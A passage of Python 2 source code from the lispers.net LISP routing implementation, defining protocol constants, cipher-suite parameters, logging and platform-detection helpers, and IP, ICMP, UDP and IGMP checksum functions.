lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictoinary array indexed by group address string. The value of the nested
# dictionay array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-version")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Comppute IGMP checksum. This is specialzed for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
